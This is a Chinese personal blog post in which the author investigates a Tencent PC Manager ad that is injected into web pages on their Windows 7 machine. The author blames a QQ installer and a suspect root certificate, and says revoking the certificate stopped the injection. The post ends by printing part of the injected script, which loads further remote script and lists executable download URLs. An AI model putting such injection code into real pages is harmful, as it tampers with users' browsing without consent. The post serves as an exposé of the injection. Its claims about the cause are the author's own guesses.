一个又字道出多少辛酸泪,刚爬出中移动的坑(见文 网厅新姿势:送中间人攻击“服务”),又遇小人腾讯。

“幽魂”不散

那一天,只装了几款软件的win7下访问我的博客,页面上诡异的挂着“管家为您挡广告,请开启”的图片,起初我还怀疑是服务器提供商插入了广告,没太在意。后来我在看其他网站时又出现了这个管家“幽魂”,我就懵B了。
这里不得不“表扬”一下“体贴”的腾讯弹出的管家还不是一成不变的,当我的网页存在一些黄色内容时,它提示语变成了“开启看片模式,管家为您除痕迹”,我和腾讯的节操双双碎一地。
腾讯管家中间人攻击

Win7上的IE11调开发者工具,DOM树上可见在head里插入了<script id="guanjia_show" src="http://pc2.gtimg.com/ap/gj.js?sver=1" sid="99 l="201" qqguid="…恶意脚本的引用,奇怪的是查看HTML源,发现并没有此段脚本标签。也就是说与之前中移动的中间人攻击不同的是,这个是网页篡改并不是发生在路由器或者更上一级,而是就发生在我的电脑本身上。万幸中的不幸是我新ghost的Win7,只安装了腾讯软件QQ和QQ游戏大厅,于是我比较确定是安装QQ游戏大厅时安装程序对我的电脑动了手脚,能够作为中间人查看和篡改我访问网站的内容。
这里我猜测,安装程序是在检测过我电脑上并没有安装任何杀毒软件的情况下附送的“彩蛋”,别人的win7安装并不一定复现这个管家“幽魂”。

作伪证的肯定没有向神发誓

我用的又不是QQ浏览器,怎么能被篡改网页呢?公堂之中必有内鬼,我想了想,我严重怀疑这个内鬼就是“证书”,奸情就是他作伪证!于是,我在IE设置项里找出证书管理,这里,我又一次懵B了,居然有辣么多证书…陷入大海捞针的窘境了。万幸中的不幸是管家图片再次闪现,这回我我点击“立即开户管家”,结果下载并要进行安装,不过我账户通知开户着呢,提示我需要权限的时候我是查看了详细信息里的证书信息,于是严重怀疑就是这个Verisign Class 3证书就是那个内鬼。
果断撤消此证书的激活状态,从此中间人再没有出现过。。
撤销证书激活状态

最后,附送这个恶意ga.js脚本的部分内容

(function(){
    var tipsconfig = {};
    var s = document.getElementById("guanjia_show");
        tipsconfig.gjguid = s.getAttribute("gjguid");
        tipsconfig.qqguid = s.getAttribute("qqguid");
        tipsconfig.level = s.getAttribute("l");
        tipsconfig.sid = s.getAttribute("sid");
    //启动资源的分析
    var urls    =[  "http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload70562.exe",
                    "http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71874.exe",
                    "http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload72931.exe",
                    "http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71876.exe",
                    "http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71877.exe",
                    "http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload72766.exe",
                    "http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload72767.exe",
                    "http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload72768.exe",
                    "http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload72769.exe",
                    "http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload72770.exe"];           
    var ua = window.navigator.userAgent.toLowerCase();
    var nd = {…此处省略1千字…};
    window.cende_nd_abcd_efg_mpq = nd;
    var baseurl = "http://openapi.guanjia.qq.com/fcgi-bin/getndjs?cmd=";
    var script = document.createElement("script");
    script.type = "text/javascript";
    script.charset ="utf-8";
    script.src = baseurl+tipsconfig['sid']+"&time="+(new Date).getTime();
    document.getElementsByTagName("head")[0].appendChild(script);
})(window)

Next Post Previous Post